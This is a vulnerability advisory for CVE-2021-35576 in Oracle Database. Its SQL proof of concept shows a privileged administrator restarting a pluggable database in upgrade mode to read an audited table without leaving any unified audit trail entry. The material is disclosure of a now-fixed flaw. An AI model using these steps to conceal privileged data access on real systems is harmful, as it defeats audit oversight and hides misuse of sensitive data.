Oracle Unified Audit Policy Bypass

Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPassProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       12.1.0.2, 12.2.0.1, 19cTested Version(s):         19cRisk Level:                lowSolution Status:           FixedManufacturer Notification: 2021-03-17Solution Date:             2021-10-17Public Disclosure:         2022-06-11CVE Reference:             CVE-2021-35576Author of Advisory:        Emad Al-MousaOverview:Oracle Database is a general purpose relational database management system (RDMBS).Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.*****************************************Vulnerability Details:The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection.*****************************************Proof of Concept (PoC):I will create a table in pluggable database PDB1 under HR schema and insert few records:SQL> CREATE TABLE HR.EMPLOYEE(  FIRST_NAME  VARCHAR2(50),  LAST_NAME   VARCHAR2(50));SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'EMAD','MOUSA' );SQL> commit;SQL> INSERT INTO HR.EMPLOYEE (   FIRST_NAME, LAST_NAME)VALUES ( 'SAMI','MOUSA' );SQL> commit;I will now create audit policy:SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;SQL> audit policy SELECT_P1;To check audit policies configured in PDB1 database:SQL> SELECT * FROM audit_unified_enabled_policies;Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:sqlplus / as sysdbaSQL> alter session set container=PDB1;SQL> shutdown immediate;SQL> startup upgrade;SQL> select * from HR.EMPLOYEE;SQL> startup force;SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !*****************************************References:https://www.oracle.com/security-alerts/cpuoct2021.html https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/https://nvd.nist.gov/vuln/detail/CVE-2021-35576Credit:Emad Al-Mousa: CVE-2021-35576